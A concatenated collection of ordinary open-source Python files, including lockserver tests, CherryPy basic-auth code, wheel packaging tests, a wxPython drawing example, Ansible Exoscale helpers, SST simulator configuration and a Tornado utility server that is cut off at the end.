import lockserver_daemon as lockserver
class TheTestCase(unittest.TestCase):
def setUp(self):
# Reset the lockserver's global variables between each test.
lockserver.init_globals()
def testContentionForSingleUserLock(self):
# This entire test will use this same lockdict in each request
locks = {'user':['bob']}
# Start three sessions.
sess = []
sess.append(lockserver.do_start_session())
sess.append(lockserver.do_start_session())
sess.append(lockserver.do_start_session())
# Have all three session try to acquire a lock on a single user.
lockserver.do_acquire_locks(sess[0], locks)
lockserver.do_acquire_locks(sess[1], locks)
lockserver.do_acquire_locks(sess[2], locks)
# The first session should have the lock and the other two sessions should
# be queued in order for that lock.
expected_heldlockdict = {
'node': {},
'user': {'bob': {'locked_by_session': sess[0],
'queue': [sess[1], sess[2]]}}}
expected_sessiondict = {
sess[0]: {'heldlocks': {'node': [], 'user': ['bob']},
'neededlocks': {'node': [], 'user': []},
'acquirelocksproceedeventset': True},
sess[1]: {'heldlocks': {'node': [], 'user': []},
'neededlocks': {'node': [], 'user': ['bob']},
'acquirelocksproceedeventset': False},
sess[2]: {'heldlocks': {'node': [], 'user': []},
'neededlocks': {'node': [], 'user': ['bob']},
'acquirelocksproceedeventset': False}}
status = lockserver.do_get_status()
self.assertEqual(expected_heldlockdict, status["heldlockdict"])
self.assertEqual(expected_sessiondict, status["sessiondict"])
# Have the session that holds the lock release it.
lockserver.do_release_locks(sess[0], locks)
# The first session should have the lock and the other two sessions should
# be queued in order for that lock.
expected_heldlockdict = {
'node': {},
'user': {'bob': {'locked_by_session': sess[1],
'queue': [sess[2]]}}}
expected_sessiondict = {
sess[0]: {'heldlocks': {'node': [], 'user': []},
'neededlocks': {'node': [], 'user': []},
'acquirelocksproceedeventset': True},
sess[1]: {'heldlocks': {'node': [], 'user': ['bob']},
'neededlocks': {'node': [], 'user': []},
'acquirelocksproceedeventset': True},
sess[2]: {'heldlocks': {'node': [], 'user': []},
'neededlocks': {'node': [], 'user': ['bob']},
'acquirelocksproceedeventset': False}}
status = lockserver.do_get_status()
self.assertEqual(expected_heldlockdict, status["heldlockdict"])
self.assertEqual(expected_sessiondict, status["sessiondict"])
# The session that just released it tries to acquire it again.
lockserver.do_acquire_locks(sess[0], locks)
# The first session should have the lock and the other two sessions should
# be queued in order for that lock.
expected_heldlockdict = {
'node': {},
'user': {'bob': {'locked_by_session': sess[1],
'queue': [sess[2], sess[0]]}}}
expected_sessiondict = {
sess[0]: {'heldlocks': {'node': [], 'user': []},
'neededlocks': {'node': [], 'user': ['bob']},
'acquirelocksproceedeventset': False},
sess[1]: {'heldlocks': {'node': [], 'user': ['bob']},
'neededlocks': {'node': [], 'user': []},
'acquirelocksproceedeventset': True},
sess[2]: {'heldlocks': {'node': [], 'user': []},
'neededlocks': {'node': [], 'user': ['bob']},
'acquirelocksproceedeventset': False}}
status = lockserver.do_get_status()
self.assertEqual(expected_heldlockdict, status["heldlockdict"])
self.assertEqual(expected_sessiondict, status["sessiondict"])
def testContentionForSingleNodeLock(self):
"""
This is the same as testContentionForSingleUserLock but involves contention
over a single node lock rather than over a single user lock. Both could have
been done with much less code using a helper method, but that makes the
dictionaries of expected data much less intuitive to look at and thus
makes the tests hard to understand. So, just duplicating code, instead.
"""
# This entire test will use this same lockdict in each request
locks = {'node':['123']}
# Start three sessions.
sess = []
sess.append(lockserver.do_start_session())
sess.append(lockserver.do_start_session())
sess.append(lockserver.do_start_session())
# Have all three session try to acquire a lock on a single user.
lockserver.do_acquire_locks(sess[0], locks)
lockserver.do_acquire_locks(sess[1], locks)
lockserver.do_acquire_locks(sess[2], locks)
# The first session should have the lock and the other two sessions should
# be queued in order for that lock.
expected_heldlockdict = {
'user': {},
'node': {'123': {'locked_by_session': sess[0],
'queue': [sess[1], sess[2]]}}}
expected_sessiondict = {
sess[0]: {'heldlocks': {'user': [], 'node': ['123']},
'neededlocks': {'user': [], 'node': []},
'acquirelocksproceedeventset': True},
sess[1]: {'heldlocks': {'user': [], 'node': []},
'neededlocks': {'user': [], 'node': ['123']},
'acquirelocksproceedeventset': False},
sess[2]: {'heldlocks': {'user': [], 'node': []},
'neededlocks': {'user': [], 'node': ['123']},
'acquirelocksproceedeventset': False}}
status = lockserver.do_get_status()
self.assertEqual(expected_heldlockdict, status["heldlockdict"])
self.assertEqual(expected_sessiondict, status["sessiondict"])
# Have the session that holds the lock release it.
lockserver.do_release_locks(sess[0], locks)
# The first session should have the lock and the other two sessions should
# be queued in order for that lock.
expected_heldlockdict = {
'user': {},
'node': {'123': {'locked_by_session': sess[1],
'queue': [sess[2]]}}}
expected_sessiondict = {
sess[0]: {'heldlocks': {'user': [], 'node': []},
'neededlocks': {'user': [], 'node': []},
'acquirelocksproceedeventset': True},
sess[1]: {'heldlocks': {'user': [], 'node': ['123']},
'neededlocks': {'user': [], 'node': []},
'acquirelocksproceedeventset': True},
sess[2]: {'heldlocks': {'user': [], 'node': []},
'neededlocks': {'user': [], 'node': ['123']},
'acquirelocksproceedeventset': False}}
status = lockserver.do_get_status()
self.assertEqual(expected_heldlockdict, status["heldlockdict"])
self.assertEqual(expected_sessiondict, status["sessiondict"])
# The session that just released it tries to acquire it again.
lockserver.do_acquire_locks(sess[0], locks)
# The first session should have the lock and the other two sessions should
# be queued in order for that lock.
expected_heldlockdict = {
'user': {},
'node': {'123': {'locked_by_session': sess[1],
'queue': [sess[2], sess[0]]}}}
expected_sessiondict = {
sess[0]: {'heldlocks': {'user': [], 'node': []},
'neededlocks': {'user': [], 'node': ['123']},
'acquirelocksproceedeventset': False},
sess[1]: {'heldlocks': {'user': [], 'node': ['123']},
'neededlocks': {'user': [], 'node': []},
'acquirelocksproceedeventset': True},
sess[2]: {'heldlocks': {'user': [], 'node': []},
'neededlocks': {'user': [], 'node': ['123']},
'acquirelocksproceedeventset': False}}
status = lockserver.do_get_status()
self.assertEqual(expected_heldlockdict, status["heldlockdict"])
self.assertEqual(expected_sessiondict, status["sessiondict"])
|
Hellowlol/PyTunes | refs/heads/master | libs/cherrypy/lib/auth_basic.py | 88 | # This file is part of CherryPy <http://www.cherrypy.org/>
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:expandtab:fileencoding=utf-8
__doc__ = """This module provides a CherryPy 3.x tool which implements
the server-side of HTTP Basic Access Authentication, as described in :rfc:`2617`.
Example usage, using the built-in checkpassword_dict function which uses a dict
as the credentials store::
userpassdict = {'bird' : 'bebop', 'ornette' : 'wayout'}
checkpassword = cherrypy.lib.auth_basic.checkpassword_dict(userpassdict)
basic_auth = {'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'earth',
'tools.auth_basic.checkpassword': checkpassword,
}
app_config = { '/' : basic_auth }
"""
__author__ = 'visteya'
__date__ = 'April 2009'
import binascii
from cherrypy._cpcompat import base64_decode
import cherrypy
def checkpassword_dict(user_password_dict):
"""Returns a checkpassword function which checks credentials
against a dictionary of the form: {username : password}.
If you want a simple dictionary-based authentication scheme, use
checkpassword_dict(my_credentials_dict) as the value for the
checkpassword argument to basic_auth().
"""
def checkpassword(realm, user, password):
p = user_password_dict.get(user)
return p and p == password or False
return checkpassword
def basic_auth(realm, checkpassword, debug=False):
"""A CherryPy tool which hooks at before_handler to perform
HTTP Basic Access Authentication, as specified in :rfc:`2617`.
If the request has an 'authorization' header with a 'Basic' scheme, this
tool attempts to authenticate the credentials supplied in that header. If
the request has no 'authorization' header, or if it does but the scheme is
not 'Basic', or if authentication fails, the tool sends a 401 response with
a 'WWW-Authenticate' Basic header.
realm
A string containing the authentication realm.
checkpassword
A callable which checks the authentication credentials.
Its signature is checkpassword(realm, username, password). where
username and password are the values obtained from the request's
'authorization' header. If authentication succeeds, checkpassword
returns True, else it returns False.
"""
if '"' in realm:
raise ValueError('Realm cannot contain the " (quote) character.')
request = cherrypy.serving.request
auth_header = request.headers.get('authorization')
if auth_header is not None:
try:
scheme, params = auth_header.split(' ', 1)
if scheme.lower() == 'basic':
username, password = base64_decode(params).split(':', 1)
if checkpassword(realm, username, password):
if debug:
cherrypy.log('Auth succeeded', 'TOOLS.AUTH_BASIC')
request.login = username
return # successful authentication
except (ValueError, binascii.Error): # split() error, base64.decodestring() error
raise cherrypy.HTTPError(400, 'Bad Request')
# Respond with 401 status and a WWW-Authenticate header
cherrypy.serving.response.headers['www-authenticate'] = 'Basic realm="%s"' % realm
raise cherrypy.HTTPError(401, "You are not authorized to access that resource")
|
bzennn/blog_flask | refs/heads/master | python/lib/python3.5/site-packages/wheel/test/test_tagopt.py | 326 | """
Tests for the bdist_wheel tag options (--python-tag, --universal, and
--plat-name)
"""
import sys
import shutil
import pytest
import py.path
import tempfile
import subprocess
SETUP_PY = """\
from setuptools import setup, Extension
setup(
name="Test",
version="1.0",
author_email="author@example.com",
py_modules=["test"],
{ext_modules}
)
"""
EXT_MODULES = "ext_modules=[Extension('_test', sources=['test.c'])],"
@pytest.fixture
def temp_pkg(request, ext=False):
tempdir = tempfile.mkdtemp()
def fin():
shutil.rmtree(tempdir)
request.addfinalizer(fin)
temppath = py.path.local(tempdir)
temppath.join('test.py').write('print("Hello, world")')
if ext:
temppath.join('test.c').write('#include <stdio.h>')
setup_py = SETUP_PY.format(ext_modules=EXT_MODULES)
else:
setup_py = SETUP_PY.format(ext_modules='')
temppath.join('setup.py').write(setup_py)
return temppath
@pytest.fixture
def temp_ext_pkg(request):
return temp_pkg(request, ext=True)
def test_default_tag(temp_pkg):
subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename == 'Test-1.0-py%s-none-any.whl' % (sys.version[0],)
assert wheels[0].ext == '.whl'
def test_explicit_tag(temp_pkg):
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel', '--python-tag=py32'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.startswith('Test-1.0-py32-')
assert wheels[0].ext == '.whl'
def test_universal_tag(temp_pkg):
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel', '--universal'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
assert wheels[0].ext == '.whl'
def test_universal_beats_explicit_tag(temp_pkg):
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel', '--universal', '--python-tag=py32'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
assert wheels[0].ext == '.whl'
def test_universal_in_setup_cfg(temp_pkg):
temp_pkg.join('setup.cfg').write('[bdist_wheel]\nuniversal=1')
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
assert wheels[0].ext == '.whl'
def test_pythontag_in_setup_cfg(temp_pkg):
temp_pkg.join('setup.cfg').write('[bdist_wheel]\npython_tag=py32')
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.startswith('Test-1.0-py32-')
assert wheels[0].ext == '.whl'
def test_legacy_wheel_section_in_setup_cfg(temp_pkg):
temp_pkg.join('setup.cfg').write('[wheel]\nuniversal=1')
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
assert wheels[0].ext == '.whl'
def test_plat_name_purepy(temp_pkg):
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=testplat.pure'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.endswith('-testplat_pure.whl')
assert wheels[0].ext == '.whl'
def test_plat_name_ext(temp_ext_pkg):
try:
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=testplat.arch'],
cwd=str(temp_ext_pkg))
except subprocess.CalledProcessError:
pytest.skip("Cannot compile C Extensions")
dist_dir = temp_ext_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.endswith('-testplat_arch.whl')
assert wheels[0].ext == '.whl'
def test_plat_name_purepy_in_setupcfg(temp_pkg):
temp_pkg.join('setup.cfg').write('[bdist_wheel]\nplat_name=testplat.pure')
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel'],
cwd=str(temp_pkg))
dist_dir = temp_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.endswith('-testplat_pure.whl')
assert wheels[0].ext == '.whl'
def test_plat_name_ext_in_setupcfg(temp_ext_pkg):
temp_ext_pkg.join('setup.cfg').write('[bdist_wheel]\nplat_name=testplat.arch')
try:
subprocess.check_call(
[sys.executable, 'setup.py', 'bdist_wheel'],
cwd=str(temp_ext_pkg))
except subprocess.CalledProcessError:
pytest.skip("Cannot compile C Extensions")
dist_dir = temp_ext_pkg.join('dist')
assert dist_dir.check(dir=1)
wheels = dist_dir.listdir()
assert len(wheels) == 1
assert wheels[0].basename.endswith('-testplat_arch.whl')
assert wheels[0].ext == '.whl'
|
Shaswat27/scipy | refs/heads/master | scipy/weave/examples/wx_example.py | 100 | """ This is taken from the scrolled window example from the demo.
Take a look at the DoDrawing2() method below. The first 6 lines
or so have been translated into C++.
"""
from __future__ import absolute_import, print_function
import sys
sys.path.insert(0,'..')
import inline_tools
from wxPython.wx import *
class MyCanvas(wxScrolledWindow):
def __init__(self, parent, id=-1, size=wxDefaultSize):
wxScrolledWindow.__init__(self, parent, id, wxPoint(0, 0), size, wxSUNKEN_BORDER)
self.lines = []
self.maxWidth = 1000
self.maxHeight = 1000
self.SetBackgroundColour(wxNamedColor("WHITE"))
EVT_LEFT_DOWN(self, self.OnLeftButtonEvent)
EVT_LEFT_UP(self, self.OnLeftButtonEvent)
EVT_MOTION(self, self.OnLeftButtonEvent)
EVT_PAINT(self, self.OnPaint)
self.SetCursor(wxStockCursor(wxCURSOR_PENCIL))
# bmp = images.getTest2Bitmap()
# mask = wxMaskColour(bmp, wxBLUE)
# bmp.SetMask(mask)
# self.bmp = bmp
self.SetScrollbars(20, 20, self.maxWidth/20, self.maxHeight/20)
def getWidth(self):
return self.maxWidth
def getHeight(self):
return self.maxHeight
def OnPaint(self, event):
dc = wxPaintDC(self)
self.PrepareDC(dc)
self.DoDrawing2(dc)
def DoDrawing(self, dc):
dc.BeginDrawing()
dc.SetPen(wxPen(wxNamedColour('RED')))
dc.DrawRectangle(5, 5, 50, 50)
dc.SetBrush(wxLIGHT_GREY_BRUSH)
dc.SetPen(wxPen(wxNamedColour('BLUE'), 4))
dc.DrawRectangle(15, 15, 50, 50)
dc.SetFont(wxFont(14, wxSWISS, wxNORMAL, wxNORMAL))
dc.SetTextForeground(wxColour(0xFF, 0x20, 0xFF))
te = dc.GetTextExtent("Hello World")
dc.DrawText("Hello World", 60, 65)
dc.SetPen(wxPen(wxNamedColour('VIOLET'), 4))
dc.DrawLine(5, 65+te[1], 60+te[0], 65+te[1])
lst = [(100,110), (150,110), (150,160), (100,160)]
dc.DrawLines(lst, -60)
dc.SetPen(wxGREY_PEN)
dc.DrawPolygon(lst, 75)
dc.SetPen(wxGREEN_PEN)
dc.DrawSpline(lst+[(100,100)])
# dc.DrawBitmap(self.bmp, 200, 20, true)
# dc.SetTextForeground(wxColour(0, 0xFF, 0x80))
# dc.DrawText("a bitmap", 200, 85)
font = wxFont(20, wxSWISS, wxNORMAL, wxNORMAL)
dc.SetFont(font)
dc.SetTextForeground(wxBLACK)
for a in range(0, 360, 45):
dc.DrawRotatedText("Rotated text...", 300, 300, a)
dc.SetPen(wxTRANSPARENT_PEN)
dc.SetBrush(wxBLUE_BRUSH)
dc.DrawRectangle(50,500,50,50)
dc.DrawRectangle(100,500,50,50)
dc.SetPen(wxPen(wxNamedColour('RED')))
dc.DrawEllipticArc(200, 500, 50, 75, 0, 90)
self.DrawSavedLines(dc)
dc.EndDrawing()
def DoDrawing2(self, dc):
red = wxNamedColour("RED")
blue = wxNamedColour("BLUE")
grey_brush = wxLIGHT_GREY_BRUSH
code = \
"""
//#line 108 "wx_example.py"
dc->BeginDrawing();
dc->SetPen(wxPen(*red,4,wxSOLID));
dc->DrawRectangle(5, 5, 50, 50);
dc->SetBrush(*grey_brush);
dc->SetPen(wxPen(*blue, 4,wxSOLID));
dc->DrawRectangle(15, 15, 50, 50);
"""
inline_tools.inline(code,['dc','red','blue','grey_brush'],verbose=2)
dc.SetFont(wxFont(14, wxSWISS, wxNORMAL, wxNORMAL))
dc.SetTextForeground(wxColour(0xFF, 0x20, 0xFF))
te = dc.GetTextExtent("Hello World")
dc.DrawText("Hello World", 60, 65)
dc.SetPen(wxPen(wxNamedColour('VIOLET'), 4))
dc.DrawLine(5, 65+te[1], 60+te[0], 65+te[1])
lst = [(100,110), (150,110), (150,160), (100,160)]
dc.DrawLines(lst, -60)
dc.SetPen(wxGREY_PEN)
dc.DrawPolygon(lst, 75)
dc.SetPen(wxGREEN_PEN)
dc.DrawSpline(lst+[(100,100)])
# dc.DrawBitmap(self.bmp, 200, 20, true)
# dc.SetTextForeground(wxColour(0, 0xFF, 0x80))
# dc.DrawText("a bitmap", 200, 85)
font = wxFont(20, wxSWISS, wxNORMAL, wxNORMAL)
dc.SetFont(font)
dc.SetTextForeground(wxBLACK)
for a in range(0, 360, 45):
dc.DrawRotatedText("Rotated text...", 300, 300, a)
dc.SetPen(wxTRANSPARENT_PEN)
dc.SetBrush(wxBLUE_BRUSH)
dc.DrawRectangle(50,500,50,50)
dc.DrawRectangle(100,500,50,50)
dc.SetPen(wxPen(wxNamedColour('RED')))
dc.DrawEllipticArc(200, 500, 50, 75, 0, 90)
self.DrawSavedLines(dc)
dc.EndDrawing()
def DrawSavedLines(self, dc):
dc.SetPen(wxPen(wxNamedColour('MEDIUM FOREST GREEN'), 4))
for line in self.lines:
for coords in line:
apply(dc.DrawLine, coords)
def SetXY(self, event):
self.x, self.y = self.ConvertEventCoords(event)
def ConvertEventCoords(self, event):
xView, yView = self.GetViewStart()
xDelta, yDelta = self.GetScrollPixelsPerUnit()
return (event.GetX() + (xView * xDelta),
event.GetY() + (yView * yDelta))
def OnLeftButtonEvent(self, event):
if event.LeftDown():
self.SetXY(event)
self.curLine = []
self.CaptureMouse()
elif event.Dragging():
dc = wxClientDC(self)
self.PrepareDC(dc)
dc.BeginDrawing()
dc.SetPen(wxPen(wxNamedColour('MEDIUM FOREST GREEN'), 4))
coords = (self.x, self.y) + self.ConvertEventCoords(event)
self.curLine.append(coords)
apply(dc.DrawLine, coords)
self.SetXY(event)
dc.EndDrawing()
elif event.LeftUp():
self.lines.append(self.curLine)
self.curLine = []
self.ReleaseMouse()
#---------------------------------------------------------------------------
# This example isn't currently used.
class py_canvas(wx.wxWindow):
def __init__(self, parent, id=-1, pos=wx.wxPyDefaultPosition,
size=wx.wxPyDefaultSize, **attr):
wx.wxWindow.__init__(self, parent, id, pos,size)
# wx.EVT_PAINT(self,self.on_paint)
background = wx.wxNamedColour('white')
code = """
self->SetBackgroundColour(*background);
"""
inline_tools.inline(code,['self','background'],compiler='msvc')
#----------------------------------------------------------------------------
class MyFrame(wxFrame):
def __init__(self, parent, ID, title, pos=wxDefaultPosition,
size=wxDefaultSize, style=wxDEFAULT_FRAME_STYLE):
wxFrame.__init__(self, parent, ID, title, pos, size, style)
# panel = wxPanel(self, -1)
self.GetSize()
# button = wxButton(panel, 1003, "Close Me")
# button.SetPosition(wxPoint(15, 15))
# EVT_BUTTON(self, 1003, self.OnCloseMe)
# EVT_CLOSE(self, self.OnCloseWindow)
# canvas = py_canvas(self,-1)
canvas = MyCanvas(self,-1)
canvas.Show(true)
class MyApp(wxApp):
def OnInit(self):
win = MyFrame(NULL, -1, "This is a wxFrame", size=(350, 200),
style = wxDEFAULT_FRAME_STYLE) # | wxFRAME_TOOL_WINDOW )
win.Show(true)
return true
if __name__ == "__main__":
app = MyApp(0)
app.MainLoop()
|
UniversalMasterEgg8679/ansible | refs/heads/devel | lib/ansible/module_utils/exoscale.py | 88 | # -*- coding: utf-8 -*-
#
# (c) 2016, René Moser <mail@renemoser.net>
#
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
# import module snippets
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.six.moves import configparser
from ansible.module_utils.six import integer_types, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.urls import fetch_url
EXO_DNS_BASEURL = "https://api.exoscale.ch/dns/v1"
def exo_dns_argument_spec():
return dict(
api_key=dict(default=None, no_log=True),
api_secret=dict(default=None, no_log=True),
api_timeout=dict(type='int', default=10),
api_region=dict(default='cloudstack'),
validate_certs=dict(default='yes', type='bool'),
)
def exo_dns_required_together():
return [['api_key', 'api_secret']]
class ExoDns(object):
def __init__(self, module):
self.module = module
self.api_key = self.module.params. get('api_key')
self.api_secret = self.module.params.get('api_secret')
if not (self.api_key and self.api_secret):
try:
region = self.module.params.get('api_region')
config = self.read_config(ini_group=region)
self.api_key = config['key']
self.api_secret = config['secret']
except Exception:
e = get_exception()
self.module.fail_json(msg="Error while processing config: %s" % e)
self.headers = {
'X-DNS-Token': "%s:%s" % (self.api_key, self.api_secret),
'Content-Type': 'application/json',
'Accept': 'application/json',
}
self.result = {
'changed': False,
'diff': {
'before': {},
'after': {},
}
}
def read_config(self, ini_group=None):
if not ini_group:
ini_group = os.environ.get('CLOUDSTACK_REGION', 'cloudstack')
keys = ['key', 'secret']
env_conf = {}
for key in keys:
if 'CLOUDSTACK_%s' % key.upper() not in os.environ:
break
else:
env_conf[key] = os.environ['CLOUDSTACK_%s' % key.upper()]
else:
return env_conf
# Config file: $PWD/cloudstack.ini or $HOME/.cloudstack.ini
# Last read wins in configparser
paths = (
os.path.join(os.path.expanduser('~'), '.cloudstack.ini'),
os.path.join(os.getcwd(), 'cloudstack.ini'),
)
# Look at CLOUDSTACK_CONFIG first if present
if 'CLOUDSTACK_CONFIG' in os.environ:
paths += (os.path.expanduser(os.environ['CLOUDSTACK_CONFIG']),)
if not any([os.path.exists(c) for c in paths]):
self.module.fail_json(msg="Config file not found. Tried : %s" % ", ".join(paths))
conf = configparser.ConfigParser()
conf.read(paths)
return dict(conf.items(ini_group))
def api_query(self, resource="/domains", method="GET", data=None):
url = EXO_DNS_BASEURL + resource
if data:
data = self.module.jsonify(data)
response, info = fetch_url(
module=self.module,
url=url,
data=data,
method=method,
headers=self.headers,
timeout=self.module.params.get('api_timeout'),
)
if info['status'] not in (200, 201, 204):
self.module.fail_json(msg="%s returned %s, with body: %s" % (url, info['status'], info['msg']))
try:
return self.module.from_json(to_text(response.read()))
except Exception:
e = get_exception()
self.module.fail_json(msg="Could not process response into json: %s" % e)
def has_changed(self, want_dict, current_dict, only_keys=None):
changed = False
for key, value in want_dict.items():
# Optionally limit by a list of keys
if only_keys and key not in only_keys:
continue
# Skip None values
if value is None:
continue
if key in current_dict:
if isinstance(current_dict[key], integer_types):
if value != current_dict[key]:
self.result['diff']['before'][key] = current_dict[key]
self.result['diff']['after'][key] = value
changed = True
elif isinstance(current_dict[key], string_types):
if value.lower() != current_dict[key].lower():
self.result['diff']['before'][key] = current_dict[key]
self.result['diff']['after'][key] = value
changed = True
else:
self.module.fail_json(msg="Unable to determine comparison for key %s" % key)
else:
self.result['diff']['after'][key] = value
changed = True
return changed
|
pliniopereira/ccd10 | refs/heads/master | src/ui/mainWindow/tempMonitor.py | 1 | from PyQt5 import QtWidgets
from src.business.schedulers.SchedTemperature import SchedTemperature
from src.ui.commons.layout import set_hbox
class TempMonitor(QtWidgets.QWidget):
def __init__(self, parent=None):
super(TempMonitor, self).__init__(parent)
self.tempMonitor = QtWidgets.QLabel(self)
self.Sched = SchedTemperature(self.tempMonitor)
self.label = QtWidgets.QLabel("Temperature: ", self)
self.setLayout(set_hbox(self.label, self.tempMonitor, stretch=1))
def stop_monitor(self):
self.Sched.stop_job()
def start_monitor(self):
self.Sched.start_job()
|
Hiregui92/openacademy-project | refs/heads/master | openacademy/__init__.py | 30 | from . import model
from . import wizard
|
tactcomplabs/gc64-hmcsim | refs/heads/master | test/sst/7.2.0/goblin_singlestream2-trace.py | 2 | import sst
# Define SST core options
sst.setProgramOption("timebase", "1ps")
sst.setProgramOption("stopAtCycle", "0 ns")
# Define the simulation components
comp_cpu = sst.Component("cpu", "miranda.BaseCPU")
comp_cpu.addParams({
"verbose" : 0,
"generator" : "miranda.SingleStreamGenerator",
"generatorParams.verbose" : 0,
"generatorParams.startat" : 3,
"generatorParams.count" : 500000,
"generatorParams.max_address" : 512000,
"printStats" : 1,
})
# Tell SST what statistics handling we want
sst.setStatisticLoadLevel(4)
# Enable statistics outputs
comp_cpu.enableAllStatistics({"type":"sst.AccumulatorStatistic"})
comp_l1cache = sst.Component("l1cache", "memHierarchy.Cache")
comp_l1cache.addParams({
"access_latency_cycles" : "2",
"cache_frequency" : "2 Ghz",
"replacement_policy" : "lru",
"coherence_protocol" : "MESI",
"associativity" : "4",
"cache_line_size" : "64",
"prefetcher" : "cassini.StridePrefetcher",
"debug" : "1",
"L1" : "1",
"cache_size" : "2KB"
})
# Enable statistics outputs
comp_l1cache.enableAllStatistics({"type":"sst.AccumulatorStatistic"})
comp_memory = sst.Component("memory", "memHierarchy.MemController")
comp_memory.addParams({
"coherence_protocol" : "MESI",
"backend.access_time" : "1000 ns",
"backend.mem_size" : "512MiB",
"clock" : "1GHz",
"backendConvertor" : "memHierarchy.extMemBackendConvertor",
"backend" : "memHierarchy.goblinHMCSim",
"backend.device_count" : "1",
"backend.link_count" : "4",
"backend.vault_count" : "32",
"backend.queue_depth" : "64",
"backend.bank_count" : "16",
"backend.dram_count" : "20",
"backend.capacity_per_device" : "4",
"backend.xbar_depth" : "128",
"backend.max_req_size" : "128",
"backend.trace-banks" : "1",
"backend.trace-queue" : "1",
"backend.trace-cmds" : "1",
"backend.trace-latency" : "1",
"backend.trace-stalls" : "1"
})
# Define the simulation links
link_cpu_cache_link = sst.Link("link_cpu_cache_link")
link_cpu_cache_link.connect( (comp_cpu, "cache_link", "1000ps"), (comp_l1cache, "high_network_0", "1000ps") )
link_cpu_cache_link.setNoCut()
link_mem_bus_link = sst.Link("link_mem_bus_link")
link_mem_bus_link.connect( (comp_l1cache, "low_network_0", "50ps"), (comp_memory, "direct_link", "50ps") )
|
ilexius/odoo | refs/heads/master | addons/auth_signup/__init__.py | 43 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import controllers
import res_config
import res_users
|
antmat/cocaine-tools | refs/heads/master | cocaine/proxy/utilserver.py | 2 | import logging
from tornado import web
class PingHandler(web.RequestHandler): # pylint: disable=W0223
def get(self):
self.write("OK")
class LogLevel(web.RequestHandler): # pylint: disable=W0223
def get(self):
lvl = self.application.logger.getEffectiveLevel()
self.write(logging.getLevelName(lvl))
def post(self):
lvlname = self.get_argument("level")
lvl = getattr(logging, lvlname.upper(), None)
if lvl is None:
self.write("No such level %s" % lvlname)
return
for name in ("cocaine.proxy.general", "cocaine.proxy.access", "cocaine.baseservice"):
logging.getLogger(name).setLevel(lvl)
self.write("level %s has been set" % logging.getLevelName(lvl))
class InfoHandler(web.RequestHandler): # pylint: disable=W0223
def get(self):
info = self.application.proxy.info()
self.write(info)
class UtilServer(web.Application): # pylint: disable=W0223
def __init__(self, proxy):
